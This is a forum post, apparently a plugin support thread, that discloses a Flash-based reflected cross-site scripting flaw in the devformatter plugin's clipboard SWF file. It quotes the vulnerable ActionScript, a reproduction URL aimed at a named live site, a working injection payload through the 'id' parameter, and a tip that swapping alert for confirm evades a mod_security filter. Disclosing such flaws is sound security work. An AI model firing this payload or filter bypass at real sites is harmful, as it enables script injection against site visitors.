Flash Based Reflected Cross-site scripting
-
HI,
there is flash based cross-site scripting in you plugin which affect the latest version of plugin
vulnerability exist due to outdated version of flash file
vulnerable parameter is “id”
vulnerable code is :
button.addEventListener(MouseEvent.MOUSE_OVER,function(param1:Event):*
{
ExternalInterface.call(“ZeroClipboard.dispatch”,id,”mouseOver”,null);
});
button.addEventListener(MouseEvent.MOUSE_OUT,function(param1:Event):*
{
ExternalInterface.call(“ZeroClipboard.dispatch”,id,”mouseOut”,null);
});
button.addEventListener(MouseEvent.MOUSE_DOWN,function(param1:Event):*
{
ExternalInterface.call(“ZeroClipboard.dispatch”,id,”mouseDown”,null);
});
button.addEventListener(MouseEvent.MOUSE_UP,function(param1:Event):*
{
ExternalInterface.call(“ZeroClipboard.dispatch”,id,”mouseUp”,null);
});
ExternalInterface.addCallback(“setHandCursor”,setHandCursor);
ExternalInterface.addCallback(“setText”,setText);
ExternalInterface.call(“ZeroClipboard.dispatch”,id,”load”,null);
}step to reproduce :
https://www.securitysift.com/wp-content/plugins/devformatter/_zclipboard.swf?id=\%22))}catch(e){confirm(/XSSbysahil/.source);}//&width=500&height=500
payload : \%22))}catch(e){confirm(/XSSbysahil/.source);}//&width=500&height=500
mod_security filter has been bypassed by using confirm instead of alert
contact email : [email protected]
best regards
sahil saif
- The topic ‘Flash Based Reflected Cross-site scripting’ is closed to new replies.